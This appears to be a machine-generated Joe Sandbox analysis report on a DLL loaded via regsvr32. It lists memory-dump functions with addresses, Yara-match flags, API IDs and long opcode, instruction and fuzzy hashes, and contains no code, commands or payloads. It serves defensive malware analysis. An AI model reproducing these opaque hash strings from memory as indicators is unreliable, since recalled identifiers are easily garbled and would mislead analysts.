                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: o0:X
                                                                    • API String ID: 0-645126758
                                                                    • Opcode ID: 16e91aede479f97639727f95d3587bc05ccff40046920f17c5bc1350390a4fa4
                                                                    • Instruction ID: 22f452758bb10e6d75f49cffb2921ccf5c0237a957934827f7fc810dfbc33e73
                                                                    • Opcode Fuzzy Hash: 16e91aede479f97639727f95d3587bc05ccff40046920f17c5bc1350390a4fa4
                                                                    • Instruction Fuzzy Hash: AC2168B060C7848BD348DF68C49691ABBE0FB9D358F504B1DF4CAAA261D3789645CB4A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180020CFC Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: D4}
                                                                    • API String ID: 0-491520632
                                                                    • Opcode ID: e694fe3bb7f23863c566d88b3f3e9b79af36947dfdaac95326105a138b36f14b
                                                                    • Instruction ID: bbb3bee9fa9cdc8f6282772afd18f295cdd348f2c7f059baa6db29b6d6e0bb5b
                                                                    • Opcode Fuzzy Hash: e694fe3bb7f23863c566d88b3f3e9b79af36947dfdaac95326105a138b36f14b
                                                                    • Instruction Fuzzy Hash: A9215DB550C3848BC788DF28C49651BBBE1BB8C318F444B2DF4CAAA365D7789654CF4A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BAA0C Relevance: .3, Instructions: 260COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate_errno_getptd
                                                                    • String ID:
                                                                    • API String ID: 1583075380-0
                                                                    • Opcode ID: b49a52df605eb860e81aecf945551c905b422740176ff48a34f4eb53aef691de
                                                                    • Instruction ID: f4426166551a0274cbc87ea506d96dde31d773f972a28dc170ac183a140d78d8
                                                                    • Opcode Fuzzy Hash: b49a52df605eb860e81aecf945551c905b422740176ff48a34f4eb53aef691de
                                                                    • Instruction Fuzzy Hash: 05A17332B1878142DB749F25B62E7FEB652AB85BC4F488135DE5D9BB49CE3CE0198300
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BEB60 Relevance: .2, Instructions: 202COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d9410001777fc81e6582bcbf2c9e1b051a8f1f2b874c05684980e9ac5d71aab9
                                                                    • Instruction ID: e20658b1ba342f157d4c79a616f149a8f222f128f62218160613c75f8644dd6f
                                                                    • Opcode Fuzzy Hash: d9410001777fc81e6582bcbf2c9e1b051a8f1f2b874c05684980e9ac5d71aab9
                                                                    • Instruction Fuzzy Hash: AF711872F086064BD36CCF18F96767876AAE7E4344F489075D61ACAB94EE38F9048700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180018598 Relevance: .2, Instructions: 197COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5d0a71211182b7f87b6da8fb5c4bb16c050ce1c1bc57c3eb72ccfc764dcd8f25
                                                                    • Instruction ID: 8540b9e78b3a5a21de6b0995fa07f246b5a6616f24314d9c292e70c997d69f1a
                                                                    • Opcode Fuzzy Hash: 5d0a71211182b7f87b6da8fb5c4bb16c050ce1c1bc57c3eb72ccfc764dcd8f25
                                                                    • Instruction Fuzzy Hash: 03916670904B0D8BDF48DF94C48A1EEBBF1FB48358F15821DE84AA7250DB749A89CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000F7E0 Relevance: .2, Instructions: 156COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: efccbdecd07d61b7fd9807909e593046fc70b22fd17ef27bebbdee29ceef9f7a
                                                                    • Instruction ID: b4cc55b2ba55f7836136ac8b5ed3643aad821ec95d31101853fef74eb9d9cec8
                                                                    • Opcode Fuzzy Hash: efccbdecd07d61b7fd9807909e593046fc70b22fd17ef27bebbdee29ceef9f7a
                                                                    • Instruction Fuzzy Hash: FF51787090470DABDBA9CF64C4893EEBBF0FB48354F60806DE85697390DB749A85CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001DBE8 Relevance: .2, Instructions: 153COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1505da822373411ddcecd725c63ebafe53e843356a51ddc09aa4b8a95d314011
                                                                    • Instruction ID: 8a210f576f06192acb1348665dce29b8299704b90f8c36c4c02948eefca36544
                                                                    • Opcode Fuzzy Hash: 1505da822373411ddcecd725c63ebafe53e843356a51ddc09aa4b8a95d314011
                                                                    • Instruction Fuzzy Hash: 98819EB590034E8FCB48CF68C48A5DE7FB0BB68394F614219F8569A260D774DAA5CFC4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180019300 Relevance: .1, Instructions: 129COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 197fc001b9ca96d8c078894440fafc4def679aa452f545048d4dbe605d0ae04d
                                                                    • Instruction ID: a715a821166c3325a5f96f2d5301173626eb48cd37bd72c2dcb4fea3562e42b3
                                                                    • Opcode Fuzzy Hash: 197fc001b9ca96d8c078894440fafc4def679aa452f545048d4dbe605d0ae04d
                                                                    • Instruction Fuzzy Hash: 79512EB150074A8BDB49DF28C0D76AE3FE1EB64388F20411DFD468A295D774DAA9CBC1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001CD38 Relevance: .1, Instructions: 124COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2ace7ea2d26746cc3390ccab9d64ee1f2d7dc726b4390747d9cc592a488b98cf
                                                                    • Instruction ID: fc479b7e82b21315ffd406d8fba444b33d09de74539f70da2a8813263b1569c5
                                                                    • Opcode Fuzzy Hash: 2ace7ea2d26746cc3390ccab9d64ee1f2d7dc726b4390747d9cc592a488b98cf
                                                                    • Instruction Fuzzy Hash: 65416D7020DB488FD768DF18948975ABBF0FB9A740F404A9DE5CAC7256D771D844CB82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800197A0 Relevance: .1, Instructions: 118COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 97ae2c8ea2cdf4840b91f894fd37a694475120081486fc145809f74360d0bada
                                                                    • Instruction ID: dbb4fad0742d9b29c59b9a64f17438fc1cba9462e735a4e3b2d00d7b8da19945
                                                                    • Opcode Fuzzy Hash: 97ae2c8ea2cdf4840b91f894fd37a694475120081486fc145809f74360d0bada
                                                                    • Instruction Fuzzy Hash: 4C5192B490038E8FCB48CF69C84A5DE7BB1FB48358F104A19FC26A6250D7B4D665CF94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180008AD8 Relevance: .1, Instructions: 107COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f1b44f26b2e4c7e97ddfb81a3adbda3d77288edc4ecbe0bae8cc8933f1c33e44
                                                                    • Instruction ID: 08efbb833ea687ad733901112953304226336fcfa3581264405f9509991f6ff4
                                                                    • Opcode Fuzzy Hash: f1b44f26b2e4c7e97ddfb81a3adbda3d77288edc4ecbe0bae8cc8933f1c33e44
                                                                    • Instruction Fuzzy Hash: 6551BEB490074A8BCB48CF68D4875DE7FB0FB68398F20421DEC56AA250D3B496A5CFD4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180009F5C Relevance: .1, Instructions: 107COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 16eb5be53274359ca32061ddf2fd9752b6767c1a5dd3248deb14ec1aa5e29bf1
                                                                    • Instruction ID: 52c1f8436ada09c5d91cc0f6a0e49c089501cc81ef075f7e28a52ff611ebfcf9
                                                                    • Opcode Fuzzy Hash: 16eb5be53274359ca32061ddf2fd9752b6767c1a5dd3248deb14ec1aa5e29bf1
                                                                    • Instruction Fuzzy Hash: D351B3B190438E8FCB48DF68D98A5DE7BB0FB48348F104A19FC26A6250D3B4D664CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000F917 Relevance: .1, Instructions: 99COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bcde6b28aa1f9cc532f581acc23668cd4c3c6920105dcd3780d199daaa58310a
                                                                    • Instruction ID: 871f118089c9e262c63038bd4f0fd9666d89e9c6fa6f13266ea976bdce614408
                                                                    • Opcode Fuzzy Hash: bcde6b28aa1f9cc532f581acc23668cd4c3c6920105dcd3780d199daaa58310a
                                                                    • Instruction Fuzzy Hash: CB41393190071DABDB95CFA4C8892EEBBF1FF44358F608159E852A7384DBB49685CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180019E78 Relevance: .1, Instructions: 94COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: be6c09d37bb88d9ef1cd1e4f7c6fe28a3503fab801bd979a9297db1a45dede51
                                                                    • Instruction ID: 72cb41ac5f9990f9c197b8bd4b5430fc958a2c545255f7632808fe9bc15cd904
                                                                    • Opcode Fuzzy Hash: be6c09d37bb88d9ef1cd1e4f7c6fe28a3503fab801bd979a9297db1a45dede51
                                                                    • Instruction Fuzzy Hash: A141D27090034A8BCB48DF68D8865DE7FB0FB58388F20461DE81AA6350D3B896A5CBD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180001FE0 Relevance: .1, Instructions: 94COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 937cbbccdfb62f32f5a53fbe7826fb6fdb7ed657b014fade726fdd4e8827f138
                                                                    • Instruction ID: 5a85513126e01a98bb902dccfe4af02f6196fd3989a765a33a65cbdcda0cb452
                                                                    • Opcode Fuzzy Hash: 937cbbccdfb62f32f5a53fbe7826fb6fdb7ed657b014fade726fdd4e8827f138
                                                                    • Instruction Fuzzy Hash: 0641E5B091038A8FCF88DF64D84A5DE7BB0FB58358F104A1DFC65A6250E3B49664CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180015CB0 Relevance: .1, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 17a73d98c2b5216e6ebfe3da59b71ff0bc58f6e68d4a2580613c8fab7b77e503
                                                                    • Instruction ID: 77361ced58272e7b73a95c704b243c92926a81ca7bf4620d616fd1e275fcbc28
                                                                    • Opcode Fuzzy Hash: 17a73d98c2b5216e6ebfe3da59b71ff0bc58f6e68d4a2580613c8fab7b77e503
                                                                    • Instruction Fuzzy Hash: A841D2B190434E8FCB48DF68C4865DE7FF0FB58388F204219E859A6250D3B896A5CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BA77C Relevance: .1, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _getptd
                                                                    • String ID:
                                                                    • API String ID: 3186804695-0
                                                                    • Opcode ID: 07c06ba19e2310f742034fc51624b2b683580184b74621a532736302abba6d70
                                                                    • Instruction ID: 2de2597697f93ab731bd2e50c6956aa8be418c158c66c33db9486bbd8640c629
                                                                    • Opcode Fuzzy Hash: 07c06ba19e2310f742034fc51624b2b683580184b74621a532736302abba6d70
                                                                    • Instruction Fuzzy Hash: EE31B422A1878545EB64DF2AF42E3AAB7A1EB84BC0F184175EA5D4BB95DF3CD005C704
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000C4B4 Relevance: .1, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d3646060d8cb761d7de136982460322f3472e8f5a21e87ad1ead63779f29ae52
                                                                    • Instruction ID: 4f2f4704f2b9e1c234c275d0f4f9a14eb4d491f2b4b6dbd4d57755e8fe2c6edd
                                                                    • Opcode Fuzzy Hash: d3646060d8cb761d7de136982460322f3472e8f5a21e87ad1ead63779f29ae52
                                                                    • Instruction Fuzzy Hash: 6341C4B090438ECFCF48CF68C8895CE7BB0FF58358F114A19E825A6250D3B49665CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800157D8 Relevance: .1, Instructions: 73COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1d53fd4730f7ea41163b882b7fe0da69ca66e61df5fc81e281dc4420083e2c61
                                                                    • Instruction ID: 4854a602bbf38c78d9fab67e5db6ce586c5dff59e36b89151347ba9907d49bba
                                                                    • Opcode Fuzzy Hash: 1d53fd4730f7ea41163b882b7fe0da69ca66e61df5fc81e281dc4420083e2c61
                                                                    • Instruction Fuzzy Hash: D13189B0529781ABD78CDF28C49981EBBE1FBC8344FC46A2DF9868B350D7749405CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180024574 Relevance: .1, Instructions: 71COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c1ebaef5654986e3774d51b7b5ee7bc532e1d9e9fdd7c85144d94fdf612fce43
                                                                    • Instruction ID: b456e1b49498020112758906e0882963a909b4f1eceaef019be325c5d28b8920
                                                                    • Opcode Fuzzy Hash: c1ebaef5654986e3774d51b7b5ee7bc532e1d9e9fdd7c85144d94fdf612fce43
                                                                    • Instruction Fuzzy Hash: E0317570629781ABC78CDF28C59591ABBE1FBD9344F806A2DF8868B350D774D445CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180024458 Relevance: .1, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 465da7405903931a99b4b25fdb97e1be200aa994c495fca1ee02f708772e1815
                                                                    • Instruction ID: e1cdac85440212a901397aaa30fe146fec046d1320b50ea199ee65054a90651b
                                                                    • Opcode Fuzzy Hash: 465da7405903931a99b4b25fdb97e1be200aa994c495fca1ee02f708772e1815
                                                                    • Instruction Fuzzy Hash: 0F317FB56187848B9388DF28C48641ABBE1FBDD30CF504B2DF8CAA6254D778D645CB4B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001F944 Relevance: .1, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 213fcaffb4d8b257d73b1e87ee3d57575e303918952cee2d1b890f97e83a5388
                                                                    • Instruction ID: a8885bbbd8deb659e28c33910928e4ea9ad8e802d57f0785ac04cb05f9903a21
                                                                    • Opcode Fuzzy Hash: 213fcaffb4d8b257d73b1e87ee3d57575e303918952cee2d1b890f97e83a5388
                                                                    • Instruction Fuzzy Hash: 802160B0528784AFC398DF28D49981ABBF1FB89344F806A1DF98687350E374D459CB43
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800124B4 Relevance: .1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 789a1fcad167e99ddc40482d8caf18e48711ae2075d057cfa5242344ff1b2506
                                                                    • Instruction ID: 3e7ffcddda8d873ed620f17f9684606eb13d1dd5f0b21141b7977a2e64531d07
                                                                    • Opcode Fuzzy Hash: 789a1fcad167e99ddc40482d8caf18e48711ae2075d057cfa5242344ff1b2506
                                                                    • Instruction Fuzzy Hash: AF217F74529780AFC788DF29C08981EBBE1FB99748F806A1DF88697354D375D445CF42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800141C0 Relevance: .0, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 825ba780bde58c245e7a1d3728ec0527652b1ee71a04877d42e2af350f08e315
                                                                    • Instruction ID: 85e8bde3e512593198615bb83ad7c533a741442781c438c8658c5734f088230b
                                                                    • Opcode Fuzzy Hash: 825ba780bde58c245e7a1d3728ec0527652b1ee71a04877d42e2af350f08e315
                                                                    • Instruction Fuzzy Hash: AA2148B4508384CBD349DF29D05951BBBE0BB8D75CF900B1DF4CAAB264D7789644CB0A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BDF20 Relevance: .0, Instructions: 7COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d7cc4962d52e3e4a2947f3a3b752558ec936755315000d7411880e05df0ff2ae
                                                                    • Instruction ID: fc31347d4845f3d998e9ba6323da18bd05c960c361942d9286ffbe09e89ba3fa
                                                                    • Opcode Fuzzy Hash: d7cc4962d52e3e4a2947f3a3b752558ec936755315000d7411880e05df0ff2ae
                                                                    • Instruction Fuzzy Hash: E6B09B2570CB54454765870764156155552B79CBD460440359D0D53B55D93C96444740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B98A4 Relevance: 53.8, APIs: 43, Instructions: 94COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$ErrorFreeHeapLast_errno
                                                                    • String ID:
                                                                    • API String ID: 1012874770-0
                                                                    • Opcode ID: b5d5b29a13da0feaba005b5cdbb38ef60d3e58c86b165e4530729409fd253580
                                                                    • Instruction ID: 47b9592adb7e78db4e48c04d600737f97c6ae92c5f15828eef4319a7037fd6b9
                                                                    • Opcode Fuzzy Hash: b5d5b29a13da0feaba005b5cdbb38ef60d3e58c86b165e4530729409fd253580
                                                                    • Instruction Fuzzy Hash: D6419422A55681C1EB74EFA2F8672BD5360AF84B84F046071DB6D8A9A6CE15D849C350
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BD0B8 Relevance: 36.9, APIs: 15, Strings: 6, Instructions: 130libraryloaderCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
